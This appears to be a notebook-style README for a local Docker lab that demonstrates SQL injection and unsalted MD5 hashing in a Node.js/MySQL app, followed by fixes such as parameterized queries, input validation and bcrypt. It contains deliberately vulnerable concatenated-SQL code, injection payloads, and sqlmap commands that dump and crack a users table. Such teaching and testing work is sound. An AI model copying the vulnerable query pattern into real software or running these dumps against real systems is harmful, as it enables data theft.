# Simple User API

## Introduction

This website is used to verify the following vulnerabilities:

1.SQL Injection: The user information query interface uses concatenated SQL statements, which introduces a SQL injection vulnerability.

2.Use of a One-Way Hash without a Salt: User passwords are stored using MD5 hashing, but the hashes are not salted.

To make the demo easy, we use Docker Compose for arranging the project, so it can make one click fast startup for the example environment.

## Environment Requirements

1. Docker
2. Docker Compose (version >= `3.9`)
3. Python (version >= `3.8`)

## Project Structure

- `controllers/`: The controllers of server
- - `controllers/users.js`: The `user` controller of server
- `mysql/`: The direactory for local MySQL database
- `mysql/data/`: The data direactory of database
- `mysql/config/my.cnf`: The configuration file of database
- `node_modules/`: The dependencies of Node.js
- `app.js`: The `entry` source code of the server
- `db.js`: The source code for performing basic database operations
- `package.json` or `package-json.json`: The description file for Node.js
- `routes.js`: The source of the router for the server
- `utils.js`: The source of the utility for the server

## Vulnerability Validation

### Step 1. Run the server

The example is constructed by docker compose. So it is quiet easy to run the server.

```bash
docker-compose up --build -d
```

> The server will build and run in the background.

In [27]:
!docker-compose up --build -d

[+] Building 0.0s (0/1)                                    docker:desktop-linux
[+] Building 0.2s (4/9)                                    docker:desktop-linux
 => [web internal] load build definition from Dockerfile                   0.0s
 => => transferring dockerfile: 164B                                       0.0s
 => [web internal] load metadata for docker.io/library/node:20-alpine3.19  0.0s
 => [web internal] load .dockerignore                                      0.0s
 => => transferring context: 182B                                          0.0s
 => [web 1/5] FROM docker.io/library/node:20-alpine3.19@sha256:2d8c24d910  0.2s
 => => resolve docker.io/library/node:20-alpine3.19@sha256:2d8c24d9104bda  0.2s
 => [web internal] load build context                                      0.0s
 => => transferring context: 73.43kB                                       0.0s
[+] Building 0.3s (4/9)                                    docker:desktop-linux
 => [web internal] load build definition

You can check whether the server is running by `docker ps`.

If the output includes `examples-web` and `mysql`, that means the server is running.

In [7]:
!docker ps

CONTAINER ID   IMAGE          COMMAND                  CREATED         STATUS                            PORTS                               NAMES
c2cc490cb895   examples-web   "docker-entrypoint.s…"   4 seconds ago   Up 3 seconds                      0.0.0.0:8080->8080/tcp              examples-web-1
a553d62e9a26   mysql:8.0.39   "docker-entrypoint.s…"   5 hours ago     Up 3 seconds (health: starting)   0.0.0.0:3306->3306/tcp, 33060/tcp   mysql


The port of the example server is `8080`.

You can broswer the index page of the example server.

If the output is `The example server of SQL Injection is running!`, it means the server is running now.

In [8]:
!curl http://127.0.0.1:8080

The example server of SQL Injection is running!

Before the experiment, we need to initialize the database. Access `http://127.0.0.1:8080/init` to initialize the database.

If the initialization is successful, the output will be ok.

In [9]:
!curl http://127.0.0.1:8080/init

{"msg":"ok"}

### Step 2. Verify the SQL Injection

In this example，We design a table called `Users` in the database `example`.

The structure of `Users` is like this:

```sql
CREATE TABLE IF NOT EXISTS users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(50) NOT NULL,
    email VARCHAR(100) UNIQUE,
    phone VARCHAR(20) UNIQUE,
    password VARCHAR(255) NOT NULL
)
```

We provide an interface to get the information of a user.

In [13]:
!curl "http://127.0.0.1:8080/user?id=1"

{"msg":"ok","data":{"id":1,"username":"alice","phone":"3***6"}}

You can get the information of Alice. But the phone number, the email address and the password are hidden.


In `db.js`, we have designed a SQL injection vulnerability in the function `getUserInfo(id)`. According to the OWASP description, we simulate the scenario where dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter. We implement the user information query using concatenated SQL.

The specific implementation is as follows:

```javascript
async function getUserInfo(id) {
    try {
        await pool.query('USE example');
        
        const [rows] = await pool.query('SELECT id, username, phone FROM users WHERE id = ' + id + ' LIMIT 1'); // leak!
        return rows[0];
    } catch (error) {
        console.error('Error fetching user:', error);
        throw error;
    }
}
```

It is very easy to check for the SQL injection vulnerability.

By entering the ID as `1 AND 1 = 0`, you will receive the response user is not found. However, if you input the ID as `1 AND 1 = 1`, you will retrieve the user's information.

Why does this happen? When the ID is input as `1 AND 1 = 0`, the actual SQL statement executed is `SELECT id, username, phone FROM users WHERE id = 1 AND 1 = 0 LIMIT 1`. This query will always return an empty result set because the condition `1 = 0` is never true.

On the other hand, when the ID is input as `1 AND 1 = 1`, the actual SQL statement becomes `SELECT id, username, phone FROM users WHERE id = 1 AND 1 = 1 LIMIT 1`. In this case, the condition is true, allowing the query to successfully retrieve the user's information.

In [17]:
!curl "http://127.0.0.1:8080/user?id=1%20AND%201%20%3D%200"

{"msg":"user is not found"}

In [18]:
!curl "http://127.0.0.1:8080/user?id=1%20AND%201%20%3D%201"

{"msg":"ok","data":{"id":1,"username":"alice","phone":"3***6"}}

### Step 3. Use `sqlmap` to Exploit

[`sqlmap`](https://sqlmap.org/) is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

In this experiment, we will use `sqlmap` to attack an API that is vulnerable to SQL injection.

Firstly, the initial step is to install `sqlmap`. In the `macOS`, you can easily install `sqlmap` on your machine using [`brew`](https://formulae.brew.sh/formula/sqlmap).

In [ ]:
!brew install sqlmap

Secondly, we will use the most basic command to check if the API is vulnerable to SQL injection. 

In this command, the `-u` parameter specifies the URL that needs to be tested.

In [23]:
!sqlmap -u "http://127.0.0.1:8080/user?id=1" --answers="follow=Y" --batch

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:18:08 /2024-10-13/

[22:18:08] [INFO] testing connection to the target URL
[22:18:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:18:08] [INFO] testing if the target URL content is stable
[22:18:09] [INFO] target URL content is stable
[22:18:09] [INFO] testing if GET parameter 'id' is dynamic
[22:18:09] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:18:09] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[22:18:09] [INFO] testing for SQL 

After running `sqlmap`, we receive the output `GET parameter 'id' is vulnerable`. This indicates that the `id` parameter of the API is susceptible to SQL injection, which aligns with our expected design.

Having successfully detected the vulnerability, we can use `sqlmap` to further attack the database, such as querying data tables and retrieving arbitrary data records.

We can use the `--tables` parameter to list all the data tables in the targeted database.

In [24]:
!sqlmap -u "http://127.0.0.1:8080/user?id=1" --tables

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:23:32 /2024-10-13/

[22:23:32] [INFO] resuming back-end DBMS 'mysql' 
[22:23:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1304=1304

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6279 FROM (SELECT(SLEEP(5)))JwRP)

    Type: UNION query
    Ti

At the end of the output, we can find the `users` table in the `example` database. We use the command `-D example -T users --dump` to query all user records in the database, thereby facilitating data theft. Historically, many leaked usernames, passwords, and personal information such as phone numbers from social engineering databases have been obtained through this method of exploitation.

```text
Database: example
[1 table]
+------------------------------------------------------+
| users                                                |
+------------------------------------------------------+
```

In [26]:
!sqlmap -u "http://127.0.0.1:8080/user?id=1" -D example -T users --dump  --answers="follow=Y" --batch

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.9#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:28:40 /2024-10-13/

[22:28:40] [INFO] resuming back-end DBMS 'mysql' 
[22:28:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1304=1304

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6279 FROM (SELECT(SLEEP(5)))JwRP)

    Type: UNION query
    Ti

Here is the output from `sqlmap`:

```text
Database: example                                                              
Table: users
[3 entries]
+----+-------------------+----------+-------------------------------------------+----------+
| id | email             | phone    | password                                  | username |
+----+-------------------+----------+-------------------------------------------+----------+
| 1  | alice@gmail.com   | 33445566 | e10adc3949ba59abbe56e057f20f883e (123456) | alice    |
| 2  | bob@gmail.com     | 22667788 | e10adc3949ba59abbe56e057f20f883e (123456) | bob      |
| 3  | charlie@gmail.com | 54786666 | e10adc3949ba59abbe56e057f20f883e (123456) | charlie  |
+----+-------------------+----------+-------------------------------------------+----------+
```

We can see that `sqlmap` successfully extracted all user records from the database, and even the passwords, which were hashed using MD5, have been revealed in plaintext.

> Here we can find more commands to exploit: https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap

## How to Prevent SQL Injection

### 1. Use a safe API

The best way to prevent SQL Injection vulnerabilities is the use of a safe API. It avoids using the interpreter entirely, provides a parameterized interface, or migrates to Object Relational Mapping Tools (ORMs). All this categorically limits risks from SQL Injection attacks and bolsters security a notch higher.

In the above example, we could securely fetch user data with a `mysql2` library supporting parameterized queries natively. Instead of string concatenation in SQL queries, we can replace the parts of the concatenation with placeholders denoted by `?`. The actual values will then be provided as a parameter to the query function. This approach ensures that user input is treated as data and never as executable code, thus avoiding SQL Injection.

This is how that would look in code:

```javascript
async function getUserInfoNew(id) {
    try {
        await pool.query('USE example');
        
        const [rows] = await pool.query('SELECT id, username, phone FROM users WHERE id = ? LIMIT 1', [id]); // use the parameterized interface
        return rows[0];
    } catch (error) {
        console.error('Error fetching user:', error);
        throw error;
    }
}
```

The following API endpoint is implemented using the fix solution above. By using sqlmap, it can be confirmed that there is no SQL Injection vulnerability at present.

In [29]:
!sqlmap -u "http://127.0.0.1:8080/user_new1?id=1" --answers="follow=Y" --batch

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:05:14 /2024-10-13/

[23:05:14] [INFO] testing connection to the target URL
[23:05:15] [INFO] testing if the target URL content is stable
[23:05:15] [INFO] target URL content is stable
[23:05:15] [INFO] testing if GET parameter 'id' is dynamic
[23:05:15] [WARNING] GET parameter 'id' does not appear to be dynamic
[23:05:15] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[23:05:15] [INFO] testing for SQL injection on GET parameter 'id'
[23:05:15] [INFO] testing 'AND boolean-based b

### 2. Server-side Input Validation

Positive server-side input validation implementation plays a critical role for improving application security. This approach provides defense against a variety of potential threats.

Take for example an API endpoint, which is supposed to get user data, the parameter id should be restricted to only accepting positive whole numbers. This can be enforced with regular expressions, which can check if the id parameter is correct when it is received by the controller. By using this, it helps to defend against unexpected and unwanted input from entering.

This is how that would look in code:

```javascript
const showUserInfoNew2 = async (ctx) => {
    // Verify the id parameter
    // It must be a positive whole number
    if (/^\d+$/.test(ctx.request.query.id) === false) {
        ctx.status = 404;
        ctx.body = { msg: 'user is not found' };
        return;
    }

    try {
        const res = await getUserInfo(ctx.request.query.id);
        if (!res) {
            ctx.status = 404;
            ctx.body = { msg: 'user is not found' };
            return;
        }

        // hide phone
        res.phone = res.phone[0] + '***' + res.phone[res.phone.length - 1]

        ctx.body = {
            msg: 'ok',
            data: res,
        }
    } catch (e) {
        ctx.status = e.status || 500;
        ctx.body = { msg: 'db error' };
    }
};
```

The following API endpoint is implemented using the fix solution above. By using sqlmap, it can be confirmed that there is no SQL Injection vulnerability at present.

In [30]:
!sqlmap -u "http://127.0.0.1:8080/user_new2?id=1" --answers="follow=Y" --batch

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.9#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:27:19 /2024-10-13/

[23:27:19] [INFO] testing connection to the target URL
[23:27:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:27:19] [INFO] testing if the target URL content is stable
[23:27:19] [INFO] target URL content is stable
[23:27:19] [INFO] testing if GET parameter 'id' is dynamic
[23:27:19] [WARNING] GET parameter 'id' does not appear to be dynamic
[23:27:19] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[23:27:19] [INFO] testing for SQL 

In Node.js applications, libraries such as `lodash` can be useful for handling input validation processes. However, the third-party libraries can sometimes carry certain risks, particularly related to security vulnerabilities that might become exploited. Because of this, when dealing with projects requiring stricter security protocols, it could be safer to write your own custom validation methods. This will help to reduce the chances of external security issues arising, and at the same time, provide more tailored solutions that specifically align with the particular validation demands of the project.

However, this way alone cannot fully offer complete protection. Because many applications have need of special characters being used, for example, in text inputs or when there are APIs used by mobile applications.

### 3. Escape Special Characters

For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter.


### 4. Limit the Output Quantity 

Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.

## How to Prevent Use of a One-Way Hash without a Salt

This test case addresses the vulnerability by implementing a hashing algorithm with a random salt. Specifically, the password hashing function will be modified to use the bcrypt library to generate hashes, and the bcrypt library's verify function can be used to validate the correctness of user passwords.

In order to verify the method, we can use the following command to test the password:

In [2]:
!curl "http://localhost:8080/hash-password?password=123456"

{"success":true,"hashedPassword":"$2b$10$24PFXb.teA79xWXQNwOPE.97yLicV2ARlvd90kluKWg71U4C1rRCq"}

You can find that every time you input the same password, the hashed password is different.

And then you can use the following command to verify the password:

In [6]:
!curl "http://localhost:8080/verify-password?password=123456&hashedPassword=\$2b\$10\$3FLeEIrTPJvp3OukmdHUmO8dRVoDlwcRh3o1wD0T1jTT4bBVPAS32"

{"success":true,"isMatch":true}

That means the password is correct. And you can try another password to verify the correctness of the method.

In [8]:
!curl "http://localhost:8080/verify-password?password=1234567&hashedPassword=\$2b\$10\$3FLeEIrTPJvp3OukmdHUmO8dRVoDlwcRh3o1wD0T1jTT4bBVPAS32"

{"success":true,"isMatch":false}

Sure! If you send the wrong password, the output will be `false`.